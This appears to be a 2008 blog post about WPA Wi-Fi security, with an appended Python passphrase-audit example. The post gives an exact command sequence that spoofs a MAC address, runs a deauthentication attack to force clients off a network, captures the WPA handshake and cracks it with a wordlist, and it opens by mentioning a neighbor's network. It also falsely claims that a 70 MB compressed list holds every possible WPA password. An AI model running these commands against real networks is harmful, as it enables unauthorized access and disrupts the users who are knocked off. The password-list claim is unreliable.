I noticed my neighbor's wifi was protected with WPA-TKIP. Your wifi might use WPA. If you protect it (you should, to guard against man-in-the-middle attacks), you should not use WEP, because that protocol is broken. It doesn't matter how long or complex your password is, people can still get in. WPA is better, but because it involves users picking a password, there is a risk. To make sure your WPA is secure, fire up Backtrack 3 and type exactly the following, and after each line hit enter. Do not type the lines that are in parentheses.
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng -c (channel) -w wpa --bssid (bssid) wlan0
(new shell)
aireplay-ng -0 5 -a (bssid) wlan0
(wait for the handshake)
(test)
aircrack-ng wpa-01.cap
(test again)
aircrack-ng wpa-01.cap -w /pentest/wireless/aircrack-ng/test/password.lst
So what this does is take down your wireless card, change the MAC address, find the BSSID and channel of your network with WPA on it, then perform a deauth attack to force everyone off the network. When they reconnect, it listens for the handshake between the client and the AP. Once it has the hash, it uses a password list to brute force the hash and try to get the password. The bigger the password list, the higher the chance you will get it.
The moral of the story is that if you want a secure network, choose a good password. Most people who will try to get at your network will use this attack method. If your password is not in the list, then they will never find it. There is a 28gig password list out there that contains every possible password for WPA (compressed, it's 70 megs). However, it is VERY doubtful that an attacker will use this because of the size and the amount of time it will take to try all of those. If for some reason you think a government is after your data, then they probably would use that list. In that case, use a VPN to connect to another network, and it doesn't matter if they see that traffic because it is all encrypted.
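To check a passphrase before you set it on your own AP, here is an added example (not part of the original post) that tests it against a wordlist and measures what one guess costs, using the WPA-PSK key derivation (PBKDF2-HMAC-SHA1 salted with the SSID, 4096 rounds). The sample wordlist, the SSID `HomeNetwork` and the function names are assumptions made up for the example.

```python
import hashlib
import time

# Constructed sample wordlist; in practice, read the list you audit against
# (for example the password.lst file used in the commands above).
SAMPLE_WORDLIST = ["password", "12345678", "letmein1", "qwertyuiop"]


def derive_psk(passphrase: str, ssid: str) -> bytes:
    """WPA-PSK key: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def seconds_per_guess(ssid: str, samples: int = 5) -> float:
    """Measure what one passphrase guess costs on this machine (one core)."""
    start = time.perf_counter()
    for i in range(samples):
        derive_psk(f"benchmark{i:04d}", ssid)
    return (time.perf_counter() - start) / samples


def audit_passphrase(passphrase: str, wordlist) -> list:
    """Return a list of problems; an empty list means none were found."""
    problems = []
    if not 8 <= len(passphrase) <= 63:
        problems.append("length must be 8 to 63 characters")
    if not all(32 <= ord(c) <= 126 for c in passphrase):
        problems.append("must be printable ASCII")
    # Compare case-insensitively so capitalisation alone does not pass the check.
    candidates = {w.strip().lower() for w in wordlist}
    if passphrase.lower() in candidates:
        problems.append("found in wordlist")
    return problems


if __name__ == "__main__":
    ssid = "HomeNetwork"  # hypothetical SSID, replace with your own
    for candidate in ["password", "short", "gravel-Otter-47-lantern"]:
        print(candidate, "->", audit_passphrase(candidate, SAMPLE_WORDLIST) or "ok")
    cost = seconds_per_guess(ssid)
    print(f"one guess costs about {cost * 1000:.2f} ms here")
    print(f"a 1,000,000-entry list would take about {cost * 1e6 / 3600:.1f} hours")
```

Because the SSID is the salt, the same passphrase gives a different key on a differently named network, so the timing applies per network name.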
Wednesday, December 24, 2008